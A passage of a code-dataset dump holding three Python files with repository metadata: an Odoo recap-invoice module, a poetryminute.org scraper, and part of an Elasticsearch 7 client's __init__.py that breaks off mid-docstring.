4b7332355084b28ef509efbcfa0245ab7dafc7c7 | eb82022c0cfc7c8747661cff9624ad2099fa1c3f | /dev_recap_invoice/models/recap_invoice.py | 49c018ea5e561d7472a9a8bf5373cc7adc07fe2e | [] | no_license | dadysuarsa/Odoo | 8d026a066c390cc8f72805d2672212e61260c1cb | c9becd0c192fa239520ad3e1a11d81f70832eddf | refs/heads/master | 2023-03-11T06:02:06.011575 | 2021-02-26T02:17:37 | 2021-02-26T02:17:37 | 276,346,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,488 | py |
# -*- coding: utf-8 -*-
from odoo import models, fields, api,_
from odoo.exceptions import UserError, Warning
from odoo.tools import float_is_zero, float_compare, DEFAULT_SERVER_DATETIME_FORMAT
from odoo.tools.misc import formatLang
from odoo import time
from datetime import datetime
from openerp.tools import amount_to_text_en
class AccountInvoice(models.Model):
    # Extends the core invoice model with a shipping-mode selection.
    # The recap invoice (invoice.recap) writes this field back onto the
    # underlying customer invoices when it is validated.
    _inherit = 'account.invoice'

    # Stored as selection codes '1'/'2'/'3'; labels are the shipping methods.
    ship_mode = fields.Selection([
        ('1','By air'),
        ('2','By sea'),
        ('3','By sea air')
    ],string="Ship Mode")
class recapinvoice(models.Model):
    """Recap (consolidated) customer invoice.

    Groups the lines of a posted customer invoice (``account.invoice`` of
    type ``out_invoice``) into a single recap document.  On creation the
    record draws its invoice number (``name``) and delivery-note number
    (``no_sj``) from custom sequences; on validation it propagates the
    chosen ``ship_mode`` back onto the source invoices.
    """
    _name = 'invoice.recap'

    # Recap invoice number, filled from the 'noinvrecap' sequence in create().
    name = fields.Char(string="No Invoice", readonly=True, default="NEW")
    date_trans = fields.Datetime(string='Date Transaction', required=True, index=True, copy=False,
        default=fields.Datetime.now)
    company_id = fields.Many2one('res.company', ondelete='set null',string='Company Id',index=True,default=lambda self: self.env['res.company']._company_default_get('invoice.recap'))
    user_id = fields.Many2one('res.users',string='User id ', index=True, track_visibility='onchange', default=lambda self: self.env.user)
    state= fields.Selection([
        ('draft',"Draft"),
        ('done',"Done"),
        ], string="Status", readonly=True,copy=False,index=True,default='draft')
    # "matauang" = currency (free-text, not a res.currency link).
    matauang = fields.Char(string="Currency")
    # Untaxed amount: sum of the recap lines' totals (see _njmlnilai).
    total = fields.Float(string="Untax Amount",store=True, readonly=True, compute='_njmlnilai', track_visibility='always')
    invoicerecapline_line = fields.One2many("invoice.recap.line","invoicerecap_line")
    accountinv_id = fields.Many2one("account.invoice", string="Invoice Number", domain=[('type','=','out_invoice')])
    customer_name = fields.Char(related="accountinv_id.partner_id.name", string="Customer")
    # "ppn" = VAT; summed from the source invoices (see _njmlnilaippn).
    ppn = fields.Float(string="Tax",compute="_njmlnilaippn", store=True )
    jumlahtotal = fields.Float(string="Total",compute="_njmlnilaigab", store=True )
    # "no_sj" = surat jalan (delivery note) number, filled in create().
    no_sj = fields.Char(string="Delivery Number")
    #pricelist_id = fields.Many2one('product.pricelist', string='Pricelist', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Pricelist for current sales order.")
    #total = fields.Monetary(string='Untaxed Amount', store=True, readonly=True, compute='_njmlnilai', track_visibility='always')
    #ppn = fields.Monetary(string='Taxes', store=True, readonly=True, compute='_njmlnilaippn', track_visibility='always')
    #jumlahtotal = fields.Monetary(string='Total', store=True, readonly=True, compute='_njmlnilaigab', track_visibility='always')
    currency_id = fields.Many2one(related='accountinv_id.currency_id', store=True, string='Currency', readonly=True)
    transportation = fields.Char(string="Transportation")
    sum_qty = fields.Float(string="SUM qty",compute="_sum_qty",store=True)
    sum_kemasan = fields.Float(string="SUM Kemasan",compute="_sum_qty",store=True)
    #nosj = fields.Many2one(related='accountinv_id.picking_id',string="Delivery Order Number", store=True)
    divisi = fields.Selection([
        ('textile','TEXTILE'),
        ('garment','GARMENT'),
        ], string='Division', default='textile')
    ship_mode = fields.Selection([
        ('1','By air'),
        ('2','By sea'),
        ('3','By sea air')
        ],string="Ship Mode")
    ref = fields.Char('REF', help="REF ")
    # qty_g = fields.Float(string='Qty')
    # satuan_g = fields.Char(string='Unit')
    # qty_kemasan_g = fields.Integer(string='Qty Kemasan')
    # satuan_kemasan_g = fields.Char(string='Unit Kemasan')

    # @api.multi
    # def validate(self, vals):
    #     c=''
    #     if self.divisi=='textile':
    #         c='1'
    #     if self.divisi=='garment':
    #         c='2'
    #     now=datetime.now()
    #     month = now.strftime("%m")
    #     year=now.strftime("%y")
    #     nmsequencesj=month+year
    #     nmsequence=month+year
    #     cdivisi=c+"ROUT"
    #     # vals['no_sj'] = self.env['ir.sequence'].get_sequence('nosjrecap',nmsequencesj,cdivisi+'%(y)s%(month)s',4)
    #     csj=self.env['ir.sequence'].get_sequence('nosjrecap',nmsequencesj,cdivisi+'%(y)s%(month)s',4)
    #     cinv=self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
    #     # vals['name'] = self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
    #     cvalidate = self.write({'state':'done',})
    #     isi_sj = self.write({'no_sj':csj,})
    #     isi_inv = self.write({'name':cinv,})
    #     # return super(recapinvoice, self).create(vals)
    #     return cvalidate
    #     return isi_sj
    #     return isi_inv
    #     if not self.invoicerecapline_line:
    #         raise UserError('Details Cannot Be Empty')
    #     cvalidate = self.write({'state':'done',})

    @api.model
    def create(self, vals):
        """Assign delivery-note and invoice numbers from custom sequences.

        Sequence names embed the company code and the current month/year
        (e.g. '<code>ROUT<yy><mm>' and 'INV-R/<mm>/<yy>/').
        """
        # NOTE(review): on an @api.model create, ``self`` is an empty
        # recordset, so this condition is effectively always true - confirm
        # whether the guard was intentional.
        if not self.invoicerecapline_line:
            now=datetime.now()
            month = now.strftime("%m")
            year=now.strftime("%y")
            nmsequencesj=month+year
            nmsequence=month+year
            company_code = self.env.user.company_id.code_company
            cdivisi=company_code+"ROUT"
            vals['no_sj'] = self.env['ir.sequence'].get_sequence('nosjrecap',nmsequencesj,cdivisi+'%(y)s%(month)s',4)
            vals['name'] = self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
        return super(recapinvoice, self).create(vals)

    #==================
    # @api.model
    # def create1(self, vals):
    #     raise UserError('inv')
    #     now=datetime.now()
    #     month = now.strftime("%m")
    #     year=now.strftime("%y")
    #     nmsequence=month+year
    #     vals['name'] = self.env['ir.sequence'].get_sequence('noinvrecap',nmsequence,'INV-R/%(month)s/%(y)s/',4)
    #     return super(recapinvoice, self).create(vals)
    #================

    @api.multi
    def validate(self):
        """Confirm the recap: push ship_mode to the source invoices and
        move the record to the 'done' state."""
        if not self.invoicerecapline_line:
            raise UserError('Details Cannot Be Empty')
        if self.invoicerecapline_line:
            # Collect the distinct source invoice numbers from the lines.
            list_of_inv_distinct =[]
            list_of_inv_distinct[:] =[]
            list_of_inv = [x.noinvoice for x in self.invoicerecapline_line]
            for a in list_of_inv:
                if a not in list_of_inv_distinct:
                    list_of_inv_distinct.append(a)
            rec_inv = self.env['account.invoice'].search([('number','in',list_of_inv_distinct)])
            for r in rec_inv:
                r.write({'ship_mode':self.ship_mode})
        cvalidate = self.write({'state':'done',})
        return cvalidate

    @api.depends('invoicerecapline_line','accountinv_id')
    def _njmlnilai(self):
        # Untaxed amount = sum of the line totals.
        for rec in self:
            x=sum([att.total for att in rec.invoicerecapline_line])
            rec.total=x
            #raise UserError(x)
            #rec.update({'total': rec.pricelist_id.currency_id.round(x)})

    @api.depends('invoicerecapline_line','accountinv_id')
    def _njmlnilaippn(self):
        # Tax = sum of amount_tax of the invoices referenced by the lines.
        d=[t.noinvoice for t in self.invoicerecapline_line]
        #raise UserError(list1)
        accinv=self.env['account.invoice'].search([('number','=',d)])
        c=sum([p.amount_tax for p in accinv])
        #raise UserError(c)
        self.ppn=c
        #self.update({'ppn': self.pricelist_id.currency_id.round(c)})

    @api.depends('invoicerecapline_line','accountinv_id')
    def _njmlnilaigab(self):
        # Grand total = tax + untaxed amount.
        ntotal=self.ppn+self.total
        self.jumlahtotal=ntotal
        #self.update({'jumlahtotal': self.pricelist_id.currency_id.round(ntotal)})

    # def _isirecord(self,crec,noinv):
    #     rincianinvoice = self.env['invoice.recap.line']
    #     data = {'invoicerecap_line': self.id,
    #         'no_mo': crec.no_mo,
    #         'no_design':crec.no_design,
    #         'no_design_buyer':crec.no_design_buyer,
    #         'color':crec.color,
    #         'product_id':crec.product_id,
    #         'cost_center_id':crec.cost_center_id,
    #         'qty':crec.quantity,
    #         'price':crec.price_unit,
    #         'total':crec.price_subtotal,
    #         'noinvoice':noinv.number,
    #         'account':crec.account_id,
    #         'cost_center_id':crec.cost_center_id,
    #         'inv_line_id':crec.id,
    #         'nosj':noinv.picking_id.name
    #         }
    #     return data

    @api.onchange('accountinv_id')
    def _gabunginv(self):
        """Populate the recap lines from the selected invoice.

        Company code '1' copies the invoice lines one by one via the ORM;
        any other company aggregates them with a raw SQL GROUP BY query.
        """
        ckemasan=''
        cjmlkemasan=0
        company_code = self.env.user.company_id.code_company
        if company_code=='1':
            if self.accountinv_id:
                isiinv = self.env['account.invoice.line'].search([('invoice_id','=',self.accountinv_id.id)])
                #self.accountinv_id.id
                #raise UserError(isiinv)
                for crec in isiinv:
                    cariinv = self.env['account.invoice'].search([('id', '=',crec.invoice_id.id)])
                    cekkemasan = self.env['stock.picking'].search([('id','=',cariinv.picking_id.id)])
                    # for r in cekkemasan.kemasan_line:
                    #     ckemasan = r.jenis_kemasan_id.name
                    #     cjmlkemasan = r.qty
                    # raise UserError(crec.uom_id.name)
                    for noinv in cariinv:
                        # Skip lines already present on a recap for this
                        # invoice/product combination.
                        cekinv = self.env['invoice.recap.line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id),('state','!=','')])
                        #cek_orderline = self.env['invoicerecapline_line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id)])
                        if not cekinv:
                            values = self.env['invoice.recap.line'].new({'no_mo': crec.no_mo,'no_design':crec.no_design,'no_design_buyer':crec.no_design_buyer,
                                'color':crec.color,
                                'product_id':crec.product_id,
                                'cost_center_id':crec.cost_center_id,
                                'qty':crec.quantity,
                                'price':crec.price_unit,
                                'total':crec.price_subtotal,
                                'noinvoice':noinv.number,
                                'account':crec.account_id,
                                'cost_center_id':crec.cost_center_id,
                                'inv_line_id':crec.id,
                                'nosj':noinv.picking_id.name,
                                'satuan_id':crec.uom_id.id,
                                'destinasi_id':cariinv.name_destination.id
                                })
                            self.invoicerecapline_line += values
        else:
            if self.accountinv_id:
                query="""
                select a.id,a.name_destination as destinasi,b.product_id,b.name,b.invoice_id,b.account_id,b.uom_id as satuan,b.price_unit as harga,sum(b.quantity) as jmlqty,sum(b.price_subtotal) as nilaitotal
                from account_invoice a
                inner join account_invoice_line b on a.id=b.invoice_id where invoice_id=%s group by a.id,b.invoice_id,b.product_id,b.name,b.account_id,b.uom_id,b.price_unit
                """
                tes= self._cr.execute(query,(self.accountinv_id.id,))
                # tes=self.env.cr.fetchall()
                tes=self.env.cr.dictfetchall()
                for grm in tes:
                # for grm in self.env.cr.dictfetchall():
                    values = self.env['invoice.recap.line'].new({
                        'product_id':grm['product_id'],
                        'description':grm['name'],
                        'qty':grm['jmlqty'],
                        'total':grm['nilaitotal'],
                        'noinvoice':self.accountinv_id.number,
                        'account':grm['account_id'],
                        'price':grm['harga'],
                        # 'nosj':noinv.picking_id.name,
                        # 'qty_kemasan':cjmlkemasan,
                        # 'jenis_kemasan':ckemasan,
                        'satuan_id':grm['satuan'],
                        'destinasi_id':grm['destinasi']
                        })
                    self.invoicerecapline_line += values

    # def _gabunginv(self): # original before the garment delivery-note printout was added
    #     if self.divisi=='textile':
    #         if self.accountinv_id:
    #             isiinv = self.env['account.invoice.line'].search([('invoice_id','=',self.accountinv_id.id)])
    #             #self.accountinv_id.id
    #             #raise UserError(isiinv)
    #             for crec in isiinv:
    #                 cariinv = self.env['account.invoice'].search([('id', '=',crec.invoice_id.id)])
    #                 # new_lines = self.env['invoice.recap.line']
    #                 for noinv in cariinv:
    #                     cekinv = self.env['invoice.recap.line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id),('state','!=','')])
    #                     #cek_orderline = self.env['invoicerecapline_line'].search([('noinvoice','=',crec.invoice_id.number),('product_id','=',crec.product_id.id)])
    #                     if not cekinv:
    #                         # data = self._isirecord(crec,noinv)
    #                         # new_line = new_lines.new(data)
    #                         # new_line._set_additional_fields()
    #                         # new_lines += new_line
    #                         values = self.env['invoice.recap.line'].new({'no_mo': crec.no_mo,'no_design':crec.no_design,'no_design_buyer':crec.no_design_buyer,
    #                             'color':crec.color,
    #                             'product_id':crec.product_id,
    #                             'cost_center_id':crec.cost_center_id,
    #                             'qty':crec.quantity,
    #                             'price':crec.price_unit,
    #                             'total':crec.price_subtotal,
    #                             'noinvoice':noinv.number,
    #                             'account':crec.account_id,
    #                             'cost_center_id':crec.cost_center_id,
    #                             'inv_line_id':crec.id,
    #                             'nosj':noinv.picking_id.name
    #                             })
    #                         self.invoicerecapline_line += values # end of the original, before the garment delivery-note printout was added
    ##     else:
    ##         cariinv=self.env['account.invoice'].search([('picking_id','=',self.accountinv_id.picking_id.id)])
    ##         raise UserError(cariinv.picking_id.id)

    @api.multi
    def _updateinvgabungan(self):
        # Back-link: stamp this recap's number onto every source invoice
        # referenced by the recap lines.
        filterinv = self.env['invoice.recap.line'].search([('name','=',self.name)])
        #raise UserError(filterinv.noinvoice)
        for rec in filterinv:
            if rec :
                x=self.env['account.invoice'].search([('number','=',rec.noinvoice)])
                x.write({'invoice_gabungan':self.name})
                #raise UserError(rec.noinvoice)

    @api.depends("invoicerecapline_line")
    def _sum_qty(self):
        # Totals over the recap lines: product quantity and packing quantity.
        nqty1=0
        nqty2=0
        for r in self:
            for z in r.invoicerecapline_line:
                nqty1+=z.qty
                nqty2+=z.qty_kemasan
            r.sum_qty=nqty1
            r.sum_kemasan = nqty2

    @api.one
    def action_change(self):
        # Manually override the recap number with the free-text REF field.
        res = self.write({
            'name':self.ref,
            })
        return res

    # @api.depends("invoicerecapline_line")
    # def sum_qty_kemasan(self):
    #     nqty2=0
    #     for z in self.invoicerecapline_line:
    #         nqty2+=z.qty_kemasan
    #     self.sum_kemasan=nqty2

    @api.multi
    def todraft(self):
        # Reset a confirmed recap back to draft.
        if self.state =='done':
            res = self.write({
                'state':'draft',
                })
            return res
class recapinvoiceline(models.Model):
    """One line of a recap invoice (invoice.recap).

    Snapshot of a source invoice line (product, quantities, amounts) plus
    the number of the invoice and delivery order it came from.
    """
    _name = 'invoice.recap.line'

    # Recap invoice number, mirrored from the parent record.
    name = fields.Char(related="invoicerecap_line.name", store=True)
    no_mo = fields.Char(string="Order No")
    no_design = fields.Char(string="Design No")
    no_design_buyer = fields.Char(string="Design Buyer")
    color = fields.Char(string="Color")
    description = fields.Char(string="Description")
    account = fields.Many2one("account.account",string="Account")
    product_id = fields.Many2one("product.product", string="Product")
    cost_center_id = fields.Many2one("account.cost.center",string="Cost Center")
    invoice_tax = fields.Many2one("account.tax",string="Tax",readonly=True)
    # Number of the source customer invoice this line was copied from.
    noinvoice = fields.Char(string="Invoice Number")
    nosj = fields.Char(string="Delivery Order Number")
    nama_barang = fields.Char(related="product_id.name")
    price = fields.Float(string="Price", readonly=True)
    qty = fields.Float(string="Quantity", readonly=True)
    total = fields.Float(string="Total", readonly=True)
    # Parent recap; cascade delete removes lines with the recap.
    invoicerecap_line = fields.Many2one("invoice.recap", ondelete='cascade', index=True, copy=False)
    state = fields.Selection(related="invoicerecap_line.state", store=True)
    #noinvoice_gabungan = fields.Char(related="invoicerecap_line.name", store=True)
    date_trans = fields.Datetime(string='Date Transaction', required=True, index=True, copy=False,
        default=fields.Datetime.now)
    company_id = fields.Many2one('res.company', ondelete='set null',string='Company Id',index=True,default=lambda self: self.env['res.company']._company_default_get('invoice.recap.line'))
    user_id = fields.Many2one('res.users',string='User id ', index=True, track_visibility='onchange', default=lambda self: self.env.user)
    # Database id of the source account.invoice.line.
    inv_line_id = fields.Integer()
    keterangan = fields.Char(string="Keterangan")
    qty_kemasan = fields.Float(string='Packing Qty')
    jenis_kemasan = fields.Many2one("jenis.kemasan",string='Packing')
    satuan_id = fields.Many2one("product.uom",string="Unit")
    destinasi_id = fields.Many2one("master.destination.line",string="Destination")

    # def _set_additional_fields(self):
    #     pass
"dads02_zetti@yahoo.com"
] | dads02_zetti@yahoo.com |
2eeed853918df0de5ab7cec3d171e4774f6d87a9 | 148e05840285e37ea9f08d654fbc7746df25f149 | /poem_parser/poetryminute.py | 404747e51d6e95aa79808795f91c040e40c0db8d | [] | no_license | jedmitten/poem_parser | 2d6828450f6ec6544fa75cb89f1e08a160e4b645 | a02db8bc5909a0a3ebc1f9bd17b1a72b251b1781 | refs/heads/master | 2022-12-09T07:00:37.287677 | 2019-10-21T17:27:59 | 2019-10-21T17:27:59 | 152,363,685 | 0 | 0 | null | 2019-10-21T17:28:00 | 2018-10-10T04:36:43 | Python | UTF-8 | Python | false | false | 1,819 | py | import requests
from bs4 import BeautifulSoup
BASE_URL = 'http://www.poetryminute.org'
AUTHOR = 'author'
DATE = 'date'
CATEGORY = 'category'
TITLE = 'title'
BASE_DIR = 'poems-by'
DIRS = {
AUTHOR: '-'.join([BASE_DIR, AUTHOR]),
DATE: '-'.join([BASE_DIR, DATE]),
# CATEGORY: '-'.join([BASE_DIR, CATEGORY]),
TITLE: '-'.join([BASE_DIR, TITLE])
}
BLOG_DIV = 'blog_div_text'
def get_poems():
    """Scrape poetryminute.org index pages into a nested dict.

    Returns ``{index_kind: {category: [{'link', 'title', 'author'}, ...]}}``
    where ``index_kind`` is one of the keys of ``DIRS`` (author/date/title)
    and ``category`` is the page's <h2> heading (e.g. an author name or a
    month, depending on the index).  Performs one HTTP GET per index page.
    """
    collection = {}
    for poem_dir in DIRS:
        full_url = '/'.join([BASE_URL, DIRS[poem_dir]])
        resp = requests.get(full_url)
        soup = BeautifulSoup(resp.content, 'html.parser')
        # The listing lives in a div of class 'blog_div_text': alternating
        # <h2> category headings and <ul> lists of poems.
        div = soup.find(attrs={"class": BLOG_DIV}).children
        category = ''
        d_category = {}
        for child in div:
            if child.name == 'h2':
                category = child.string
            elif child.name == 'ul':
                for li in child.find_all('li'):
                    l_poems = d_category.get(category, [])
                    link = li.a['href']
                    text = li.string or li.text
                    # Replace non-breaking spaces so ' by ' splitting works.
                    text = text.replace('\xa0', ' ')
                    # Entries are usually "<title> by <author>"; rsplit keeps
                    # any ' by ' inside the title intact.
                    if ' by ' in text:
                        title, author = text.rsplit(' by ', 1)
                    else:
                        title = text
                        author = ''
                    # On the by-author index the heading IS the author name.
                    if poem_dir == AUTHOR:
                        author = category
                    d = {
                        'link': link,
                        'title': title,
                        'author': author,
                    }
                    l_poems.append(d)
                    d_category[category] = l_poems
            # elif child.next == 'h2':
            #     collection[month] = d
            else:
                # Skip whitespace/other nodes between headings and lists.
                continue
        collection[poem_dir] = d_category
    return collection
| [
"jmitten@obsidiansecurity.com"
] | jmitten@obsidiansecurity.com |
a3d5611e64e5372b7311db438c29c731f14d8d8a | cbfcbbfa606c16d5051f9f202bc3421e60192a9e | /elasticsearch7/client/__init__.py | 59fbaa8b6f776a6aeef5d765d46c1f46fda3778f | [
"MIT"
] | permissive | RitterHou/search_platform | d7292e229bc7ee2a521cdcd8a6ce2d8f2e5ba38a | a72b4e4d78b4375f69887e75abcc1e6a6782c551 | refs/heads/production_es7 | 2023-08-23T17:29:25.224031 | 2021-10-12T06:16:56 | 2021-10-12T06:16:56 | 416,202,756 | 0 | 0 | null | 2021-10-12T06:16:56 | 2021-10-12T05:54:40 | Python | UTF-8 | Python | false | false | 84,424 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from ..transport import Transport
from ..exceptions import TransportError
from ..compat import string_types, urlparse, unquote
from .indices import IndicesClient
from .ingest import IngestClient
from .cluster import ClusterClient
from .cat import CatClient
from .nodes import NodesClient
from .remote import RemoteClient
from .snapshot import SnapshotClient
from .tasks import TasksClient
from .xpack import XPackClient
from .utils import query_params, _make_path, SKIP_IN_PATH, _bulk_body
# xpack APIs
from .ccr import CcrClient
from .data_frame import Data_FrameClient
from .deprecation import DeprecationClient
from .graph import GraphClient
from .ilm import IlmClient
from .license import LicenseClient
from .migration import MigrationClient
from .ml import MlClient
from .monitoring import MonitoringClient
from .rollup import RollupClient
from .security import SecurityClient
from .sql import SqlClient
from .ssl import SslClient
from .watcher import WatcherClient
from .enrich import EnrichClient
from .slm import SlmClient
from .transform import TransformClient
logger = logging.getLogger("elasticsearch")
def _normalize_hosts(hosts):
    """
    Helper function to transform hosts argument to
    :class:`~elasticsearch.Elasticsearch` to a list of dicts.
    """
    # Nothing given - defer to connection-class defaults down the line.
    if hosts is None:
        return [{}]

    # A single bare string means a single host.
    if isinstance(hosts, string_types):
        hosts = [hosts]

    normalized = []
    for entry in hosts:
        if not isinstance(entry, string_types):
            # Already dict-like - pass through untouched.
            normalized.append(entry)
            continue

        # urlparse only recognizes the netloc when a scheme separator is
        # present, so prefix scheme-less strings with '//'.
        url = entry if "://" in entry else "//%s" % entry
        parsed = urlparse(url)

        host = {"host": parsed.hostname}
        if parsed.port:
            host["port"] = parsed.port
        if parsed.scheme == "https":
            # https implies SSL and defaults the port to 443.
            host["port"] = parsed.port or 443
            host["use_ssl"] = True
        if parsed.username or parsed.password:
            host["http_auth"] = "%s:%s" % (
                unquote(parsed.username),
                unquote(parsed.password),
            )
        if parsed.path and parsed.path != "/":
            host["url_prefix"] = parsed.path
        normalized.append(host)
    return normalized
class Elasticsearch(object):
"""
Elasticsearch low-level client. Provides a straightforward mapping from
Python to ES REST endpoints.
The instance has attributes ``cat``, ``cluster``, ``indices``, ``ingest``,
``nodes``, ``snapshot`` and ``tasks`` that provide access to instances of
:class:`~elasticsearch.client.CatClient`,
:class:`~elasticsearch.client.ClusterClient`,
:class:`~elasticsearch.client.IndicesClient`,
:class:`~elasticsearch.client.IngestClient`,
:class:`~elasticsearch.client.NodesClient`,
:class:`~elasticsearch.client.SnapshotClient` and
:class:`~elasticsearch.client.TasksClient` respectively. This is the
preferred (and only supported) way to get access to those classes and their
methods.
You can specify your own connection class which should be used by providing
the ``connection_class`` parameter::
# create connection to localhost using the ThriftConnection
es = Elasticsearch(connection_class=ThriftConnection)
If you want to turn on :ref:`sniffing` you have several options (described
in :class:`~elasticsearch.Transport`)::
# create connection that will automatically inspect the cluster to get
# the list of active nodes. Start with nodes running on 'esnode1' and
# 'esnode2'
es = Elasticsearch(
['esnode1', 'esnode2'],
# sniff before doing anything
sniff_on_start=True,
# refresh nodes after a node fails to respond
sniff_on_connection_fail=True,
# and also every 60 seconds
sniffer_timeout=60
)
Different hosts can have different parameters, use a dictionary per node to
specify those::
# connect to localhost directly and another node using SSL on port 443
# and an url_prefix. Note that ``port`` needs to be an int.
es = Elasticsearch([
{'host': 'localhost'},
{'host': 'othernode', 'port': 443, 'url_prefix': 'es', 'use_ssl': True},
])
If using SSL, there are several parameters that control how we deal with
certificates (see :class:`~elasticsearch.Urllib3HttpConnection` for
detailed description of the options)::
es = Elasticsearch(
['localhost:443', 'other_host:443'],
# turn on SSL
use_ssl=True,
# make sure we verify SSL certificates
verify_certs=True,
# provide a path to CA certs on disk
ca_certs='/path/to/CA_certs'
)
If using SSL, but don't verify the certs, a warning message is showed
optionally (see :class:`~elasticsearch.Urllib3HttpConnection` for
detailed description of the options)::
es = Elasticsearch(
['localhost:443', 'other_host:443'],
# turn on SSL
use_ssl=True,
# no verify SSL certificates
verify_certs=False,
# don't show warnings about ssl certs verification
ssl_show_warn=False
)
SSL client authentication is supported
(see :class:`~elasticsearch.Urllib3HttpConnection` for
detailed description of the options)::
es = Elasticsearch(
['localhost:443', 'other_host:443'],
# turn on SSL
use_ssl=True,
# make sure we verify SSL certificates
verify_certs=True,
# provide a path to CA certs on disk
ca_certs='/path/to/CA_certs',
# PEM formatted SSL client certificate
client_cert='/path/to/clientcert.pem',
# PEM formatted SSL client key
client_key='/path/to/clientkey.pem'
)
Alternatively you can use RFC-1738 formatted URLs, as long as they are not
in conflict with other options::
es = Elasticsearch(
[
'http://user:secret@localhost:9200/',
'https://user:secret@other_host:443/production'
],
verify_certs=True
)
By default, `JSONSerializer
<https://github.com/elastic/elasticsearch-py/blob/master/elasticsearch/serializer.py#L24>`_
is used to encode all outgoing requests.
However, you can implement your own custom serializer::
from elasticsearch.serializer import JSONSerializer
class SetEncoder(JSONSerializer):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, Something):
return 'CustomSomethingRepresentation'
return JSONSerializer.default(self, obj)
es = Elasticsearch(serializer=SetEncoder())
"""
def __init__(self, hosts=None, transport_class=Transport, **kwargs):
"""
:arg hosts: list of nodes, or a single node, we should connect to.
Node should be a dictionary ({"host": "localhost", "port": 9200}),
the entire dictionary will be passed to the :class:`~elasticsearch.Connection`
class as kwargs, or a string in the format of ``host[:port]`` which will be
translated to a dictionary automatically. If no value is given the
:class:`~elasticsearch.Connection` class defaults will be used.
:arg transport_class: :class:`~elasticsearch.Transport` subclass to use.
:arg kwargs: any additional arguments will be passed on to the
:class:`~elasticsearch.Transport` class and, subsequently, to the
:class:`~elasticsearch.Connection` instances.
"""
self.transport = transport_class(_normalize_hosts(hosts), **kwargs)
# namespaced clients for compatibility with API names
self.indices = IndicesClient(self)
self.ingest = IngestClient(self)
self.cluster = ClusterClient(self)
self.cat = CatClient(self)
self.nodes = NodesClient(self)
self.remote = RemoteClient(self)
self.snapshot = SnapshotClient(self)
self.tasks = TasksClient(self)
self.xpack = XPackClient(self)
self.ccr = CcrClient(self)
self.data_frame = Data_FrameClient(self)
self.deprecation = DeprecationClient(self)
self.graph = GraphClient(self)
self.ilm = IlmClient(self)
self.indices = IndicesClient(self)
self.license = LicenseClient(self)
self.migration = MigrationClient(self)
self.ml = MlClient(self)
self.monitoring = MonitoringClient(self)
self.rollup = RollupClient(self)
self.security = SecurityClient(self)
self.sql = SqlClient(self)
self.ssl = SslClient(self)
self.watcher = WatcherClient(self)
self.enrich = EnrichClient(self)
self.slm = SlmClient(self)
self.transform = TransformClient(self)
def __repr__(self):
try:
# get a list of all connections
cons = self.transport.hosts
# truncate to 5 if there are too many
if len(cons) > 5:
cons = cons[:5] + ["..."]
return "<{cls}({cons})>".format(cls=self.__class__.__name__, cons=cons)
except:
# probably operating on custom transport and connection_pool, ignore
return super(Elasticsearch, self).__repr__()
# AUTO-GENERATED-API-DEFINITIONS #
    @query_params()
    def ping(self, params=None):
        """
        Returns whether the cluster is running.

        `<https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html>`_
        """
        # A HEAD request on the root endpoint; any transport-level failure
        # (connection refused, timeout, auth error, ...) is reported as
        # ``False`` rather than raised.
        try:
            return self.transport.perform_request("HEAD", "/", params=params)
        except TransportError:
            return False
    @query_params()
    def info(self, params=None):
        """
        Returns basic information about the cluster.

        `<https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html>`_
        """
        # GET on the root endpoint: cluster name, node name, version, etc.
        return self.transport.perform_request("GET", "/", params=params)
@query_params(
"pipeline",
"refresh",
"routing",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
)
def create(self, index, id, body, doc_type=None, params=None):
"""
Creates a new document in the index. Returns a 409 response when a document
with a same ID already exists in the index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html>`_
:arg index: The name of the index
:arg id: Document ID
:arg body: The document
:arg doc_type: The type of the document
:arg pipeline: The pipeline id to preprocess incoming documents
with
:arg refresh: If `true` then refresh the affected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the index operation. Defaults
to 1, meaning the primary shard only. Set to `all` for all shard copies,
otherwise set to any non-negative value less than or equal to the total
number of copies for the shard (number of replicas + 1)
"""
for param in (index, id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"PUT", _make_path(index, doc_type, id, "_create"), params=params, body=body
)
@query_params(
"if_primary_term",
"if_seq_no",
"op_type",
"pipeline",
"refresh",
"routing",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
)
def index(self, index, body, doc_type=None, id=None, params=None):
"""
Creates or updates a document in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html>`_
:arg index: The name of the index
:arg body: The document
:arg doc_type: The type of the document
:arg id: Document ID
:arg if_primary_term: only perform the index operation if the
last operation that has changed the document has the specified primary
term
:arg if_seq_no: only perform the index operation if the last
operation that has changed the document has the specified sequence
number
:arg op_type: Explicit operation type. Defaults to `index` for
requests with an explicit document ID, and to `create`for requests
without an explicit document ID Valid choices: index, create
:arg pipeline: The pipeline id to preprocess incoming documents
with
:arg refresh: If `true` then refresh the affected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte
:arg wait_for_active_shards: Sets the number of shard copies
